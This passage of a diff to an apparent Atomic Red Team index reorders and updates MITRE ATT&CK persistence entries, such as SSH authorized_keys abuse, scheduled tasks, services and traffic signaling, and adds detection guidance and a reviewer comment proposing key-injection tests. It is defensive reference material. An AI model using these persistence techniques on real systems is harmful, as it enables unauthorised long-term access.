when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain
applications to be re-opened when a user logs into their machine after reboot.
@@ -13463,15 +13687,18 @@ persistence:
\n\nAn adversary can modify one of these files directly to include a link
to their malicious executable to provide a persistence mechanism each time
the user reboots their machine (Citation: Methods of Mac Malware Persistence)."
- id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-01-24T19:51:37.795Z'
- created: '2020-01-24T18:15:06.641Z'
+ name: Re-opened Applications
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.007
+ url: https://attack.mitre.org/techniques/T1547/007
+ - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
+ description: Patrick Wardle. (2014, September). Methods of Malware Persistence
+ on Mac OS X. Retrieved July 5, 2017.
+ source_name: Methods of Mac Malware Persistence
x_mitre_platforms:
- macOS
x_mitre_data_sources:
@@ -13565,33 +13792,9 @@ persistence:
phase_name: persistence
modified: '2020-03-30T13:47:29.922Z'
created: '2017-05-31T21:31:18.867Z'
- x_mitre_contributors:
- - Praetorian
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
- - Office 365
- - SaaS
- - Azure AD
- x_mitre_detection: |-
- Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
-
- Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.
-
- If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.
-
- For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.
- x_mitre_defense_bypassed:
- - Network intrusion detection system
- - Anti-virus
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '3.0'
x_mitre_data_sources:
- Office 365 account logs
- Azure activity logs
@@ -13604,9 +13807,33 @@ persistence:
- File monitoring
- Authentication logs
- Binary file metadata
- x_mitre_version: '3.0'
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_defense_bypassed:
+ - Network intrusion detection system
+ - Anti-virus
+ x_mitre_detection: |-
+ Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
+
+ Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.
+
+ If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.
+
+ For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure
+ - Office 365
+ - SaaS
+ - Azure AD
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_contributors:
+ - Praetorian
atomic_tests: []
T1547.001:
technique:
@@ -13682,22 +13909,22 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T16:16:26.182Z'
created: '2020-01-23T22:02:48.566Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Oddvar Moe, @oddvarmoe
- x_mitre_data_sources:
- - Windows Registry
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ x_mitre_contributors:
+ - Oddvar Moe, @oddvarmoe
+ x_mitre_platforms:
+ - Windows
identifier: T1547.001
atomic_tests:
- name: Reg Key Run
@@ -13884,24 +14111,77 @@ persistence:
phase_name: persistence
modified: '2020-03-25T23:30:20.638Z'
created: '2019-12-12T14:59:58.168Z'
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
- NetSPI Startup Stored Procedures) Consider enabling audit features that can
- log malicious startup activities.'
+ x_mitre_data_sources:
+ - Application logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
- SYSTEM
- root
- x_mitre_is_subtechnique: true
+ x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
+ NetSPI Startup Stored Procedures) Consider enabling audit features that can
+ log malicious startup activities.'
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ atomic_tests: []
+ T1098.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1098.004
+ url: https://attack.mitre.org/techniques/T1098/004
+ - source_name: SSH Authorized Keys
+ url: https://www.ssh.com/ssh/authorized_keys/
+ description: ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June
+ 24, 2020.
+ - source_name: Venafi SSH Key Abuse
+ url: https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities
+ description: 'Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity
+ Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24,
+ 2020.'
+ - source_name: Cybereason Linux Exim Worm
+ url: https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability
+ description: Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting
+ Linux Exim Server Vulnerability. Retrieved June 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: SSH Authorized Keys
+ description: |-
+ Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.
+
+ Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)
+ id: attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ modified: '2020-06-25T16:32:23.367Z'
+ created: '2020-06-24T12:42:35.144Z'
x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file.
+
+ Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.
x_mitre_data_sources:
- - Application logs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Tony Lambert, Red Canary
+ x_mitre_platforms:
+ - Linux
+ - macOS
atomic_tests: []
T1053.005:
technique:
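Review bot: The detection text added for T1098.004 (the `x_mitre_detection` block ending with "Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config") scopes file-integrity monitoring to each user's `~/.ssh/authorized_keys`, but the description itself anticipates the adversary editing `sshd_config`, and OpenSSH's `AuthorizedKeysFile` directive (and `AuthorizedKeysCommand`) can point the daemon at a path or program outside that per-user set, so an integrity watch on the home-directory file alone can be sidestepped. The `RSAAuthentication` directive named in the description is, as far as I know, a protocol-1 setting that current OpenSSH ignores, so a consumer of this index should not treat its presence or absence as a signal. Since this entry appears to mirror upstream ATT&CK text, the actionable gap in this file is `atomic_tests: []`: the technique ships with no test, and a test that appends a key to `~/.ssh/authorized_keys` plus one that redirects `AuthorizedKeysFile` in `sshd_config` would exercise both halves of the detection guidance. Note also that the typo "modifiying" is carried over verbatim from upstream.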
@@ -13950,13 +14230,11 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:03.730Z'
created: '2019-11-27T14:58:00.429Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -13972,11 +14250,13 @@ persistence:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
@@ -14115,19 +14395,18 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:04.006Z'
created: '2017-05-31T21:30:46.977Z'
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_remote_support: true
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -14138,18 +14417,19 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_remote_support: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
atomic_tests: []
T1546.002:
technique:
@@ -14189,23 +14469,23 @@ persistence:
phase_name: persistence
modified: '2020-03-23T12:23:04.955Z'
created: '2020-01-24T13:51:01.210Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Bartosz Jerzman
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
+
+ Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.
x_mitre_data_sources:
- File monitoring
- Windows Registry
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
-
- Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Bartosz Jerzman
+ x_mitre_platforms:
+ - Windows
identifier: T1546.002
atomic_tests:
- name: Set Arbitrary Binary as Screensaver
@@ -14263,22 +14543,22 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T15:42:48.910Z'
created: '2020-01-24T17:16:11.806Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - DLL monitoring
- - Windows Registry
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys.
Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012
R2 may generate events when unsigned SSP DLLs try to load into the LSA by
setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber
2014) (Citation: Microsoft Configure LSA)'
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Windows Registry
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
identifier: T1547.005
atomic_tests:
- name: Modify SSP configuration in registry
@@ -14329,8 +14609,23 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-25T23:30:20.871Z'
+ modified: '2020-04-17T17:47:57.075Z'
created: '2019-06-28T17:52:07.296Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Process monitoring
+ - File monitoring
+ - Application logs
x_mitre_detection: "Consider monitoring application logs for abnormal behavior
that may indicate suspicious installation of application software components.
Consider monitoring file locations associated with the installation of new
@@ -14340,21 +14635,6 @@ persistence:
or accessing files. Log authentication attempts to the server and any unusual
traffic patterns to or from the server and internal network. (Citation: US-CERT
Alert TA15-314A Web Shells) "
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Process monitoring
- - File monitoring
- - Application logs
- x_mitre_version: '1.1'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_is_subtechnique: false
atomic_tests: []
T1574.010:
technique:
@@ -14384,8 +14664,22 @@ persistence:
phase_name: defense-evasion
modified: '2020-03-26T19:37:28.912Z'
created: '2020-03-12T20:43:53.998Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Services
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: "Look for changes to binaries and service executables that
may normally occur during software updates. If an executable is written, renamed,
and/or moved to match an existing service executable, it could be detected
@@ -14394,22 +14688,8 @@ persistence:
for abnormal process call trees from typical processes and services and for
execution of other commands that could relate to Discovery or other adversary
techniques. "
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process command-line parameters
- - Services
- - File monitoring
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
identifier: T1574.010
atomic_tests:
- name: File System Permissions Weakness
@@ -14514,32 +14794,32 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:43:33.981Z'
+ modified: '2020-06-20T22:01:09.906Z'
created: '2020-03-13T11:42:14.444Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Windows Registry
- - Services
- - Process command-line parameters
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Process whitelisting
+ x_mitre_data_sources:
+ - Windows Registry
+ - Services
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Matthew Demaske, Adaptforward
+ x_mitre_platforms:
+ - Windows
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
@@ -14585,25 +14865,25 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T17:21:27.487Z'
created: '2020-01-24T19:00:32.917Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Since a shortcut's target path likely will not change, modifications
to shortcut files that do not correlate with known software changes, patches,
removal, etc., may be suspicious. Analysis should attempt to relate shortcut
file change or creation events to other potentially suspicious events based
on known adversary behavior such as process launches of unknown executables
that make network connections.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
identifier: T1547.009
atomic_tests:
- name: Shortcut Modification
@@ -14699,19 +14979,19 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T23:47:39.124Z'
created: '2020-01-15T18:00:33.603Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
x_mitre_detection: |-
The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.
Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.005
atomic_tests:
- name: Add file to Local Library StartupItems
@@ -14785,30 +15065,31 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-23T23:50:48.027Z'
+ modified: '2020-05-19T21:22:37.865Z'
created: '2019-12-19T19:43:34.507Z'
- x_mitre_defense_bypassed:
- - Host intrusion prevention systems
- - Anti-virus
- - File monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_detection: |-
- System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
-
- Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Jean-Ian Boutin, ESET
+ - McAfee
+ - Ryan Becwar
x_mitre_data_sources:
- EFI
- BIOS
- API monitoring
- x_mitre_contributors:
- - McAfee
- - Ryan Becwar
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
+
+ Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Host intrusion prevention systems
+ - Anti-virus
+ - File monitoring
atomic_tests: []
T1543.002:
technique:
@@ -14886,25 +15167,25 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T22:13:59.473Z'
created: '2020-01-17T16:15:19.870Z'
- x_mitre_contributors:
- - Tony Lambert, Red Canary
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - root
+ x_mitre_platforms:
+ - Linux
x_mitre_detection: |-
Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.
Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.
- x_mitre_platforms:
- - Linux
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Tony Lambert, Red Canary
identifier: T1543.002
atomic_tests:
- name: Create Systemd Service
@@ -15017,10 +15298,15 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T15:24:26.476Z'
created: '2020-01-24T15:51:52.317Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Scott Lundgren, @5twenty9, Carbon Black
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
+ x_mitre_detection: |-
+ Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
+
+ The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)
x_mitre_data_sources:
- API monitoring
- Binary file metadata
@@ -15028,37 +15314,33 @@ persistence:
- File monitoring
- Loaded DLLs
- Process monitoring
- x_mitre_detection: |-
- Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
-
- The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Scott Lundgren, @5twenty9, Carbon Black
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
- T1545:
+ T1205:
technique:
+ revoked: false
+ id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Traffic Signaling
+ description: |-
+ Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
+
+ Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
+
+ The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
external_references:
- source_name: mitre-attack
- external_id: T1545
- url: https://attack.mitre.org/techniques/T1545
+ external_id: T1205
+ url: https://attack.mitre.org/techniques/T1205
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Traffic Signaling
- description: |-
- Adversaries may use traffic signaling to hide open ports used for persistence or command and control. Traffic signaling is a well-established method used by both defenders and adversaries to hide open ports from access/discovery. To enable a port, an adversary sends a series of packets with certain characteristics before the port will be opened. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1545/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
-
- This technique has been observed for both the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
-
- The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
